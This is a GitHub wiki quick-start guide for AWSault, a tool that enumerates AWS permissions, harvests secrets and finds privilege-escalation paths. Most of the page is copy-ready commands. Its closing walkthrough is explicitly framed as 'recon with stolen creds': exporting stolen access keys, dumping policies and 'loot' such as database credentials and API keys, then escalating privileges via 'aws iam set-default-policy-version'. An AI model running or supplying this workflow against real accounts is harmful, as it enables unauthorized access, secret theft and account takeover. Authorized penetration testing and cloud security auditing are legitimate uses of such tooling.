Quick Start - baeziy/AWSault GitHub Wiki
- AWSault is installed
- AWS credentials are configured (see Credentials)
awsaultThis fires read-only API calls across 120+ AWS services and reports which ones your credentials can access. Takes 30-60 seconds depending on your connection.
awsault --profile stagingawsault --godeepThis runs all five phases:
- Surface scan (permission mapping)
- Deep enumeration (resource config pulling)
- Security audit (misconfiguration detection)
- Loot extraction (secret harvesting)
- Identity recon (privilege escalation path detection)
After the scan, you also get Suggested Next Steps with ready-to-copy AWS CLI commands for every service where you have access.
awsault --godeep --all-regions --output report.htmlawsault --services iam,s3,ec2,lambda,rds# what IAM permissions do you have?
awsault --show iam
# check multiple services
awsault --show iam,s3,lambda
# see everything
awsault --show all# view the actual IAM users data
awsault --show iam --detail list_users
# view S3 buckets
awsault --show s3 --detail list_bucketsAfter a --godeep scan, revisit the results anytime without rescanning:
# view identity, policies, roles, and privesc paths
awsault --recon
# view security audit findings
awsault --findings
# view extracted secrets and credentials
awsault --loot
# view everything at once
awsault --recon --findings --loot# export last scan to different formats
awsault --output results.json
awsault --output results.csv
awsault --output results.htmlAfter a --godeep scan, focus on:
- Privilege escalation paths — shown at the bottom of the recon output. These are your fastest route to higher access.
- Security findings — sorted by severity (CRITICAL first). Public S3 buckets, open security groups, admin policies.
- Loot — secrets from Secrets Manager, SSM parameters, Lambda env vars. Often contain database credentials or API keys.
- Assumable roles — if you can assume a role with more permissions, that's your lateral movement path.
-
Suggested next steps — AWSault generates concrete
awsCLI commands you can copy-paste.
# step 1: quick recon with stolen creds
export AWS_ACCESS_KEY_ID=AKIA...
export AWS_SECRET_ACCESS_KEY=...
awsault
# step 2: full deep dive
awsault --godeep --output initial_recon.html
# step 3: check specific services of interest
awsault --show iam
awsault --show s3 --detail list_buckets
# step 3b: review deep data anytime
awsault --recon # who am i, what can i do, how can i escalate
awsault --findings # what's misconfigured
awsault --loot # what secrets were found
# step 3c: read specific policy documents live from AWS
awsault --policy S3Access # read an inline or managed policy
awsault --policy S3Access,DbRead # read multiple at once
awsault --policy S3Access --user admin # read a policy on a different user
awsault --policy S3Access --role SomeRole # read an inline policy on a role
awsault --policy S3Access --version v2 # read a specific managed policy version
awsault --all-policies # dump every policy on current identity
awsault --all-policies --role BackendRole # trust policy + all attached policies on a role
# step 4: if privesc found, escalate and rescan
aws iam set-default-policy-version --policy-arn <arn> --version-id v2
awsault --godeep --output post_escalation.html